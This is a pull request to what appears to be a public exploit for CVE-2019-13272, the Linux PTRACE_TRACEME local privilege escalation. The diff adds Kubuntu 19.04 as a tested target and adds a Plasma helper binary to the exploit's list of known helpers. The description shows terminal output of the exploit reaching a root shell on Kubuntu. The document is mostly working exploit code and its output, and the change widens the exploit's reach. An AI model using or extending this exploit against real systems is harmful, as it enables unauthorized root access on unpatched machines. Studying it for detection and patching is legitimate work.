### PR TITLE
Add a known helper for Kubuntu 19.04 / Plasma

### DIFF
--- a/CVE-2019-13272.c
+++ b/CVE-2019-13272.c
@@ -15,6 +15,7 @@
 // - Ubuntu 16.04.5 kernel 4.15.0-29-generic
 // - Ubuntu 18.04.1 kernel 4.15.0-20-generic
 // - Ubuntu 19.04 kernel 5.0.0-15-generic
+// - Kubuntu 19.04 kernel 5.0.0-21-generic
 // - Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic
 // - Linux Mint 19 kernel 4.15.0-20-generic
 // - Xubuntu 16.04.4 kernel 4.13.0-36-generic
@@ -115,6 +116,7 @@ const char *known_helpers[] = {
   "/usr/lib/gsd-backlight-helper",
   "/usr/lib/gsd-wacom-led-helper",
   "/usr/lib/gsd-wacom-oled-helper",
+  "/usr/bin/plasma-remote-helper",
 };
 
 /* temporary printf; returned pointer is valid until next tprintf */


### PR DESCRIPTION
A Kubuntu system and possibly other Plasma-centric distributions
may not have any of the known helpers present.

`/usr/bin/plasma-remote-helper` was tested successfully on Kubuntu 19.04.

```
CVE-2019-13272$ ./pwned
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[~] Done, looks good
[.] Searching for known helpers ...
[~] Found known helper: /usr/bin/plasma-remote-helper
[.] Using helper: /usr/bin/plasma-remote-helper
[.] Spawning suid process (/usr/bin/pkexec) ...
[.] Tracing midpid ...
[~] Attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

CVE-2019-13272#
```